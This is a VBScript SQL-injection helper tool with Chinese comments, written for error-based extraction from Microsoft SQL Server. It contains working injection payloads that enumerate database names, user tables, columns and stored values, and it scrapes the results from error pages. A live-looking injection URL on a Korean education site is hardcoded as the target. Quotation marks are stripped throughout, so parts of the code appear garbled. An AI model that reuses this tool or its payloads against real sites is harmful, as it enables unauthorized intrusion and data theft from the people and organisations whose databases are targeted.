'sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 by tr4c3[at]126[dot]com '亦适用于mssql 2000的注射,不过2000还是用nbsi和pangolin。
作者:tr4c3
'为了保持脚本的通用性,放弃了 and (select col_name(object_id('tablename'),n))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入
const method = get '提交方式请修改此处,有get和post可选
const display = d 's 保存到文件,d输出到屏幕
dim strurl_b, strurl, i, k, myarray, strarg, strd
strurl_b = http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120' '基于注射点的不确定性,此处请手工更改
i = 1 '库的基数
k = 0 '表和字段的基数
myarray = split(strurl_b, ?, -1, 1)
strurl = myarray(0) '取url
strarg = myarray(1) '取参数
set args = wscript.arguments
if args.count = 0 then
showu
end if
'if args.count =1 and lcase(args(0))
'************************************************************************
' 爆库
'************************************************************************
if args.count =1 then
if lcase(trim(args(0)))=databases then
resut(---------------===============================--------------)
resut(all the databases:)
do
strdata = and quotename(db_name(&i&))=0--
sqlinj(strdata)
i = i + 1
loop until strd=
resut(---------------===============================--------------)
wscript.quit
elseif lcase(trim(args(0)))= info then
resut(---------------===============================--------------)
resut(the current database is:)
strdata = and quotename(db_name())=0--
sqlinj(strdata)
resut(---------------===============================--------------)
resut(the database user is:)
strdata = and quotename(user)=0--
sqlinj(strdata)
resut(---------------===============================--------------)
resut(the system_user is:)
strdata = and quotename(system_user)=0--
sqlinj(strdata)
resut(---------------===============================--------------)
wscript.quit
end if
end if
'************************************************************************
' 爆表
'************************************************************************
if args.count=2 and lcase(trim(args(1)))=tables then
resut(---------------===============================--------------)
resut(the tables of & args(0))
do
strdata = and (select top 1 quotename(name) from & args(0) & .dbo.sysobjects where xtype=char(85) and name not in (select top & k & name from &args(0)&.dbo.sysobjects where xtype=char(85)))=0--
sqlinj(strdata)
k = k + 1
loop until strd=
resut(---------------===============================--------------)
wscript.quit
end if
'************************************************************************
' 爆字段
'************************************************************************
if args.count=3 and lcase(trim(args(2)))=cols then
database = args(0)
table = args(1)
target = database & .dbo. & table
targetcol = database & .dbo.syscolumns
resut(---------------===============================--------------)
resut(the columns of & target)
do
strdata = and (select top 1 quotename(name) from & targetcol & where id=object_id('& target &') and name not in (select top &k& name from & targetcol & where id=object_id('& target &')))=0--
sqlinj(strdata)
k = k + 1
loop until strd=
resut(---------------===============================--------------)
wscript.quit
end if
'************************************************************************
' 爆字段值
'************************************************************************
if args.count=4 and lcase(trim(args(3)))=values then
database = args(0)
table = args(1)
col = args(2)
target = database & .dbo. & table
resut(---------------===============================--------------)
resut(the values of & args(2) & in &target)
do
strdata = and (select top 1 quotename(& col &) from & target & where & col & not in (select top & k & & col & from & target &))=0--
sqlinj(strdata)
k = k + 1
loop until strd=
resut(---------------===============================--------------)
wscript.quit
end if
sub sqlinj(value)
if ucase(method) = get then
value = strarg & value
set objxml = createobject(microsoft.xmlhttp)
objxml.open get, strurl &? & value , false
objxml.setrequestheader referer, strurl
'objxml.setrequestheader accept-language, euc-kr
objxml.send()
strrevs = objxml.responsetext '默认用这个
'strrevs = bytes2bstr(objxml.responsebody) '韩文有时候要用这个
if instr(strrevs,'[)0 and instr(strrevs,]')0 then
strd = mid(strrevs,instr(strrevs,'[)+2, instr(strrevs,]') - instr(strrevs,'[)-2)
resut( |_&strd)
else
strd =
end if
elseif ucase(method) = post then
value = strarg & value
set objxml = createobject(microsoft.xmlhttp)
objxml.open post, strurl, false
objxml.setrequestheader content-type, application/x-www-form-urlencoded
objxml.setrequestheader referer, strurl
objxml.send(urlencode(value))
strrevs = objxml.responsetext '默认用这个
'strrevs = bytes2bstr(objxml.responsebody) '韩文有时候要用这个
if instr(strrevs,'[)0 and instr(strrevs,]')0 then
strd = mid(strrevs,instr(strrevs,'[)+2, instr(strrevs,]') - instr(strrevs,'[)-2)
resut( |_&strd)
else
strd =
end if
end if
end sub
function resut(strinfo)
if ucase(display) = s then
set fso = createobject(scripting.filesystemobject)
set fso1 = fso.opentextfile(result.txt,8,true)
fso1.writeline(strinfo)
fso1.close
set fso = nothing
elseif ucase(display) = d then
wscript.echo(strinfo)
end if
end function
function urlencode(str)
str = replace(str, ,+)
urlencode = str
end function
function bytes2bstr(vin)
strreturn =
for i = 1 to lenb(vin)
thischarcode = ascb(midb(vin,i,1))
if thischarcode strreturn = strreturn & chr(thischarcode)
else
nextcharcode = ascb(midb(vin,i+1,1))
strreturn = strreturn & chr(clng(thischarcode) * &h100 + cint(nextcharcode))
i = i + 1
end if
next
bytes2bstr = strreturn
end function
sub showu()
with wscript
.echo(+--------------------------=====================------------------------------+)
.echo(sql2005注射辅助脚本(粗糙版),用于mssql显错模式 by tr4c3[at]126[dot]com)
.echo(usage:)
.echo( cscript&.scriptname& info--爆基本信息)
.echo( cscript&.scriptname& databases--爆所有库名)
.echo( cscript&.scriptname& pubs tables--爆库pubs里所有用户表名)
.echo( cscript&.scriptname& pubs authors cols--爆库pubs里authors表的所有字段名)
.echo( cscript&.scriptname& pubs authors au_id values--爆pubs.dbo.authors里au_id的值)
.echo(+--------------------------=====================------------------------------+)
.quit
end with
end sub